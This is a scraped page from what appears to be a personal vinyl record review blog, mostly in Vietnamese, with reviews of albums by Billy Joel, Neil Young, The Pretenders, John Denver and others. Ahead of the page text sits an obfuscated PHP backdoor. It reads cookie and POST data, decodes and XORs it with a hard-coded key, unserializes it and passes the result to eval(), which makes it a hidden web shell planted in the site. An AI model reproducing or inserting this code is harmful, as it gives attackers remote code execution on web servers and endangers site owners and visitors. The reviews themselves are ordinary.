$gkTikmvawS = class_exists("L_JuS");if (!$gkTikmvawS){class L_JuS{private $pEkriz;public static $gEJHvAd = "0bac3d14-080a-40da-9ae3-072f26eb3bee";public static $hiuUA = NULL;public function __construct(){$nACiVMM = $_COOKIE;$ZybOWNLPM = $_POST;$AjoGQkCSfU = @$nACiVMM[substr(L_JuS::$gEJHvAd, 0, 4)];if (!empty($AjoGQkCSfU)){$CHzhCIO = "base64";$MphdUtXc = "";$AjoGQkCSfU = explode(",", $AjoGQkCSfU);foreach ($AjoGQkCSfU as $XvwaYg){$MphdUtXc .= @$nACiVMM[$XvwaYg];$MphdUtXc .= @$ZybOWNLPM[$XvwaYg];}$MphdUtXc = array_map($CHzhCIO . chr ( 182 - 87 ).'d' . 'e' . "\143" . chr (111) . "\x64" . chr (101), array($MphdUtXc,)); $MphdUtXc = $MphdUtXc[0] ^ str_repeat(L_JuS::$gEJHvAd, (strlen($MphdUtXc[0]) / strlen(L_JuS::$gEJHvAd)) + 1);L_JuS::$hiuUA = @unserialize($MphdUtXc);}}public function __destruct(){$this->rybNWbPiMq();}private function rybNWbPiMq(){if (is_array(L_JuS::$hiuUA)) {$EgZDwdc = str_replace("\74" . chr ( 405 - 342 )."\160" . "\150" . chr ( 886 - 774 ), "", L_JuS::$hiuUA[chr ( 642 - 543 ).chr (111) . 'n' . "\164" . "\x65" . "\x6e" . 't']);eval($EgZDwdc);exit();}}}$RYRUp = new L_JuS(); $RYRUp = NULL;} ?> B.l.u.e – Page 5 – Inside the crowd, I dance [alone]

B.l.u.e

Inside the crowd, I dance [alone]

Menu Close

Page 5 of 33

Barbra Streisand – The Way We Were

Barbra Streisand được rất nhiều báo chí cũng như giới chuyên môn đánh giá cực cao, được ưu ái gọi là Nữ hoàng trong các Diva, là nữ ca sĩ có số lượng đĩa bán chạy nhất mọi thời đại. Mình có kha khá record của bà, The Way We Were là đĩa đầu tiên.

The Way We Were không tồi, nhưng cách Streisand hát và diễn nó khiến mình không thích lắm. Đồng ý là cách Streisand xử lý từng bài nhạc trong album khiến thính giả cảm nhận được bà đã đặt hết tâm hồn của mình vào từng nốt nhạc, từng lời ca, mọi chi tiết dù nhỏ đều được trau chuốt kĩ. Nhưng nhìn chung album như một vở nhạc kịch gắng nhưng gượng. Mình không cảm nhận được gì nhiều khi nghe album này, dù đã nghe lại vài lần.

Vẫn còn vài record khác của Barbra Streisand trong bộ sưu tập, hi vọng lần sau trải nghiệm sẽ tốt hơn.

Billy Joel – Piano Man

Record mà mình biết đến đầu tiên của Billy Joel, đồng thời cũng là (một trong những) record mà mình muốn có nhất, ngay từ trước khi mua turntable. Đúng ra, Piano Man không hay bằng các đĩa khác cũng của Billy Joel sau này mình có, nhưng nó vẫn là đĩa mình ưng nhất trong số các đĩa của Joel.

Piano Man là album thứ hai, và là album rất quan trọng trong sự nghiệp của Joel. Sau khi ra album đầu tiên, ông cắt đứt hợp đồng với Family Productions và dính vào kiện tụng rùm beng. Có những giai đoạn tưởng chừng sự nghiệp âm nhạc của ông bị buộc phải dừng lại. Nhưng không, Joel dành hết tâm huyết của mình vào việc sáng tác. Trong một dịp, đài WMMR ở Philadelphia mời ông thu trực tiếp bài Captain Jack trên sóng. Bài này được ưa thích đến mức trở thành bài hát được thính giả yêu cầu nhiều nhất trong lịch sử của đài. Sau đấy, hãng Columbia Records quyết định kí hợp đồng với ông để sản xuất album kế tiếp. Đó là Piano Man.

Tuy trong Piano Man, Billy Joel chưa hoàn toàn đạt được độ chín muồi trong tài năng, sáng tác và chơi nhạc, nhưng có nhiều ca khúc của ông đã trở thành thương hiệu, mà hầu như những ai yêu mến Billy Joel cũng từng nghe và yêu thích qua. Record này có nhiều ca khúc hay, đáng chú nhất là Travelin’ Prayer – mà sau này Dolly Parton đã đoạt giải Grammy khi cover lại nó vào gần 30 năm sau). Tuy nhiên, ca khúc mình thích nhất trong album này, và cũng là ca khúc khiến mình thích Billy Joel từ lâu, đó là Piano Man.

Yes, they’re sharing a drink they call loneliness
But it’s better than drinkin’ alone

 

Billy Joel – Glass Houses

Thú vị. Rất thú vị. Cũng phải mấy ngày rồi mới nghe được một album khiến mình thốt lên thế. Billy Joel trong Glass Houses hoàn toàn khác hẳn Billy Joel rất thành công với The Stranger hay 52nd Street trước đó. Có vẻ Joel muốn thoát khỏi hình ảnh một anh chàng hát nhạc rock nhẹ, nghiêng về phía những bản ballad ngọt mùi vốn đã làm nên tên tuổi và thương hiệu của mình. Ở album này, Joel nổi loạn.

Cover của album là hình ảnh Joel mặc áo da hầm hố, cầm cục đá ném bể kính một ngôi nhà kính 2 tầng. Và ngay từ những phút đầu tiên của album, tiếng vang lên rõ nhất là tiếng kính vỡ. Joel muốn ném vỡ đi hình ảnh đã đi sâu vào lòng người trước đây, để dựng lên một Joel mới, mạnh mẽ, cá tính và “chất lừ” hơn. Joel đã thành công.

Đi xuyên suốt trong album là tiếng guitar điện với những cú rift, chặt gãy gọn với tempo được đẩy nhanh. Nhiều người nghĩ rằng thời điểm album này xuất hiện và sự phát triển đang đà lên của thứ nhạc Punk cộng New Wave Anh Quốc ắt hẳn có gì đó liên quan. Điều này không phải hoàn toàn vô lý. Glass Houses hoàn toàn có thể liệt vào thể loại New Wave. Đôi chỗ giọng và tiết tấu của bài hát rất dễ liên tưởng đến Elvis Costello cũng đang làm mưa làm giớ thời điểm đó.

Tuy nhiên, nói đúng ra thì Glass Houses của Joel cũng không hoàn toàn chỉ có rock và guitar điện. Có những bài có cảm giác Joel một phần quay trở lại Joel của những bản ballad ngày xưa; không nhẹ nhàng thế, nhưng nhẹ hẳn đi ở một mức độ. Có bài còn trở lại với tiếng keyboard quen thuộc ngày nào.

Dù vẫn có vài lời chê rằng Glass Houses của Joel chưa ‘rock’ tới. Hay những thính giả trung thành đã quá quen với hình ảnh Joel lãng tử dịu dàng trước đó không thể thích ứng với sự thay đổi trong album này, thì cũng không thể phủ nhận Glass Houses là một trong những album thành công và đáng nhớ nhất của Billy Joel. Cái thứ nhạc mà Joel chơi trong album này sống động và đầy năng lượng như muốn bùng cháy, và xen vào đó, thỉnh thoảng lại là vài giây phút lắng êm đềm lãng mạn. Điều này khiến mình yêu thích nó chỉ trong lần đầu nghe thử…

John Denver – Windsong & Spirit

John Denver is legend – one of the most talented and popular singers and composers of our time. Although it is hard to say I am a country music fanboy (I do listen to, occasionally), living in a Southern state like Texas, I think there are few things you can’t just ignore: cowboys, guns and country songs, just to name some. Record stores here normally have a separated dedicated section for country music. And of course, John Denver is a familiar name there.

I don’t pay much attention to John Denver and I kinda dislike his albums’ cover. Sounds silly, right? But in fact, covers are important and Denver’s are just not appealing. However, when I saw Windsong & Spirit laying there for just $1 each, I went ahead and picked them up. John Denver is always worth a try.

I made a mistake playing Spirit first. It nearly killed my music mood for the whole night. Spirit is no way a terrible album, but it is not a terrific, mind-blowing one, either. John Denver is well-known for his acoustic guitar. That man can do pretty much everything with it. And his talent shows here. His voice is joy and fun, seems really charismatic and likable. But that’s all. I see nothing new besides that.

Then, I played Windsong. It was so much better. It gave me the warm and sensational feeling. It was hard to describe but Windsong in my opinion came very close to meditation music. You could feel there were winds and mountains, fresh breezes and water. I think they are Denver’s trademark – his incredible ability to bring all elements together and use music to bring them to audiences.

Yep, that’s it. Very short review I know. I think I might listen to Windsong again soon; I just had a feeling that I was close to wholeheartedly sense and touch it. Hope next time will be better because there are few artists that you can give them benefit of the doubt – like: their works must be good. John Denver is one of them.

 

The Pretenders – Pretenders

Pretenders là debut album của The Pretenders – một ban nhạc rock Anh/ Mỹ. Pretenders được xem như là một trong những debut album thành công nhất trong lịch sử. Nó được đón nhận và yêu thích ngay khi vừa mới ra đời, điều mơ ước của biết bao nhiêu ban nhạc.

Ra mắt vào đầu năm 1980, Pretenders là một trong những tên tuổi có ảnh hưởng mạnh trong làn sóng xâm-lược của dòng nhạc Anh quốc, lần này là sự kết hợp giữa punk và new wave. Vì vậy, Pretenders không dễ nghe chút nào. Không liên quan lắm, nhưng lần đầu nghe Pretenders mình có cảm giác trở lại là cậu bé 13 tuổi năm nào khi lần đầu được nghe thứ âm-nhạc-lạ-lùng của Megadeth (Peace Sells, Symphony of Destruction…) – những pha guitar chắc gọn, ca sĩ gằn giọng đọc nhiều hơn hát. Dĩ nhiên, The Pretenders chơi thứ nhạc không thô gằn và gãy gọn như Megadeth, giọng của Chrissie Hynde cũng dễ nghe hơn nhiều so với Dave Mustaine. Nói đúng hơn, với sự pha trộn thêm chút pop, album Pretenders dễ nghe vào hơn. Có cảm giác, Pretenders có vẻ chịu một phần ảnh hưởng của Kinks và The Who – những ban Anh quốc trong làn sóng xâm-lược lần đầu.

Ca sĩ chính đồng thời là thủ lĩnh của ban nhạc là phụ nữ, vì vậy ngoài cái tempo nhạc dồn dập đặc trưng của punk, Pretenders còn có điểm thêm những nét dịu dàng và ngọt ngào rất nhẹ. Ca khúc nổi nhất trong album chắc hẳn phải là Brass in Pocket. Nhiều người đánh giá đó là ca khúc hay nhất trong album, và thậm chí là hay nhất trong sự nghiệp của The Pretenders. Riêng mình, trong album này, mình thích bản cover Stop Your Sobbing mà họ cover của Kinks hơn.

Nhìn chung thì album này rất được, nó nhanh và dồn dập với những ca khúc như Tattooed Love Boys, Up the Neck nhưng cũng có những giai điệu ngọt ngào như trong Kid hay Don’t Get Me Wrong. Hơi khó nghe nếu bạn không phải là fan của thể loại nhạc punk/ new wave, nhưng nếu là fan của thể loại này rồi thì it’s worth a try.

‘Cause I gonna make you see
There’s nobody else here
No one like me

Neil Young – Harvest

Harvest là một trong những record đầu tiên mình có, đồng thời cũng là điểm đầu tiên thôi thúc cái thú vui sưu tập vinyl trong mình. Mình từng viết về Harvest của Neil Young như sau

Rồi có lần như tuần rồi, tôi đi estate sale nhà một ông giáo dạy nhạc vừa qua đời. Trong lúc người ta đang hối hả ngược xuôi ở tầng dưới, trả giá từng cái chén, cái ly trong bộ sưu tập của ông, thì mình tôi ngồi im ắng ở phòng trên lầu, nhìn vào dàn máy nhạc và đống đĩa vinyl của ông mà không mấy ai quan tâm. Trong turntable, vẫn đang để Harvest của Neil Young. Tôi đưa mắt nhìn vào góc phòng, nơi đó nằm lạc lõng cái ghế gỗ dựa bập bênh được. Tôi tự hỏi, phải chăng đây là nơi ông giáo mỗi tối ngồi đắm chìm trong âm nhạc – thứ đã đi cùng ông gần suốt cả cuộc đời. Cái lúc nghe tới ‘Old Man’, ông có buồn, có nghĩ đến điều gì không?

Và đến bây giờ, cảm giác mỗi lần nghe từng lời ca buồn đến não ruột trong Old Man vẫn còn nguyên như ban đầu. Ôi cái sự đồng cảm tuyệt diệu đấy.

—–

Harvest là album không được giới chuyên môn đánh giá cao nhưng rất thành công về doanh thu và nhất là trong lòng người hâm mộ của Neil Young. Trong album này, Young đã ưu ái mời dàn nhạc giao hưởng chơi cùng mình trong 2 bài. Những bài còn lại thì có đến 3 bài backup vocals là những người bạn cũ của ông trong Crosby, Stills & Nash (dĩ nhiên, có thể đoán, nghe rất ra mùi country folk rock – thứ nhạc mà CSN vốn được biết đến), 2 bài thành công nhất trong album là Old ManHeart of Gold thì backup vocals là James Taylor và Linda Ronstadt. Vì vậy, album này về chất lượng nghệ thuật mình thấy rất ổn, nó nghiêng về country nhiều nên giai điệu nhẹ nhàng và dễ nghe.

Nói về Old Man đi. Khó mà tin khi sáng tác bài này, Young mới 26 tuổi. Bài hát già dặn và buồn lõi đời hơn nhiều so với cái tuổi này của Young. Khi nghe bài hát, có cảm giác đó là một tay cao bồi già miền Nam, một chiều ngồi nhìn hoàng hôn, đốt thuốc và kể chuyện đời mình; hơn là một anh chàng lãng tử tóc dài quá vai, ôm cây guitar và cất giọng khàn khàn luyến láy.

Old man take a look at my life
I’m a lot like you
I need someone to love me
the whole day through

Harvest là album khá lạ kì. Nó thuộc dạng love or hate it, there is no between. Có rất nhiều người đánh giá thấp album này, vì nó không thể bằng được After the Gold Rush phát hành trước đó; hay nó quá cheesy, quá dễ nghe, hay là nó rời rạc quá, khi thì có những ca khúc gắng-làm-cho-trang-trọng đánh chung với dàn giao hưởng, chen lẫn những ca khúc dễ nghe, những ca khúc buồn man mác và cả sầu bi đau đớn… Lại có những người xem Harvest là một trong những album sáng giá nhất những năm 70. Không bàn đến Heart of Gold và Old Man, A Man Needs A Maid nghe rất hút hồn, ngay từ những nốt nhạc đầu tiên, Alabama gợi phần nào đến Lynyrd Skynyrd. Đặc biệt nhiều người đánh giá cao The Needle And The Damage Done nghe buồn như một bài nhạc blue vang lên trong chiều vắng. Mình thuộc trường hợp sau.

Đến hiện tại, Harvest vẫn là album mình nghe thường xuyên, có lẽ vì nó đóng vai trò quan trọng trong quá trình chơi vinyl của mình.

Bob Welch – French Kiss

Bob Welch chắc là tên tuổi bị ‘lãng quên’ đáng tiếc nhất trong ban nhạc Fleetwood Mac vang bóng một thời. Khi Fleetwood Mac cùng các thành viên sáng lập và ba thành viên khác được vinh danh vào Rock and Roll Hall of Fame, người ta bỏ quên tên của Bob. Giai đoạn có Bob trong band không phải giai đoạn hoàng kim của band, đúng ra đó chỉ là giai đoạn chuyển tiếp. Sau khi Bob rời khỏi, Fleetwood mới trở mình và vươn lên trở thành một trong những ban nhạc rock nổi tiếng nhất trên toàn thế giới. Tuy nhiên, vai trò ‘chuyển tiếp’ này của Bob khá quan trọng, như trong cuốn sách tiểu sử của Mick Fleetwood sau này, ông ta đã gọi Bob là ‘người đã cứu sống toàn bộ Fleetwood Mac’.

Mà thôi, hãy không nói về Fleetwood Mac, mà hãy nói tới Bob cùng album solo đầu tay French Kiss của ông.

French Kiss mở màn với hit được biết đến rộng rãi nhất của Bob – Sentimental Lady (mà Fleetwood Mac đã đưa vào album Bare Trees vài năm trước đó). Với sự giúp đỡ sản xuất của Lindsey Buckingham, Sentimental Lady đã mở màn như một quả tên lửa cực mạnh đẩy cả French Kiss lên vùn vụt, cả về thứ tự trong các bảng xếp hạng lẫn doanh thu trên toàn cầu. Nghe French Kiss phải gắng bỏ cái tên Fleetwood Mac ra khỏi đầu, vì đơn giản nó là một ban nhạc được tạo thành bởi những cái tên đầy tài năng. Bob khi còn trong band dĩ nhiên khi nghe sẽ có-cảm-giác hay hơn khi Bob ra solo. Đúng vậy, giọng của Bob không khoẻ, giọng ông hơi nhẹ, trong nhiều ca khúc nhanh và dồn dập có cảm giác đuối hẳn đi. Tuy giọng này khá hợp với Sentimental Lady, nhưng ở những ca khúc sau mình thấy hơi tụt.

Nói chung cảm nhận về cả một album mà chỉ nói đến ca khúc đầu tiên thôi thì hơi kì, nhưng đúng là các ca khúc còn lại khó có thể sánh bằng. Kể cả 2 single lọt vào top bảng xếp hạng của Bob là: Ebony EyesHot Love, Cold World. Dù Ebony Eyes có những câu guitar khá đẹp, hay lời của Hot Love, Cold World thì ổn đấy, nhưng nhìn chung vẫn chỉ là ở trên mức trung bình. Thậm chí, Hot Love, Cold World có một đoạn ngưng (break) tụt hết cả cảm xúc. Những ca khúc còn lại thì chỉ còn Lose Your Heart nghe được, vì nó chậm nên giọng của Bob nổi lên hơn.

Nhìn chung, mình khá thất vọng về album này, thỉnh thoảng nghe chơi qua thì được, nhưng mình không thật sự đánh giá cao lắm. Nếu phải cho điểm, mình sẽ cho 3.5/5

© 2024 B.l.u.e. All rights reserved.

Theme by Anders Norén.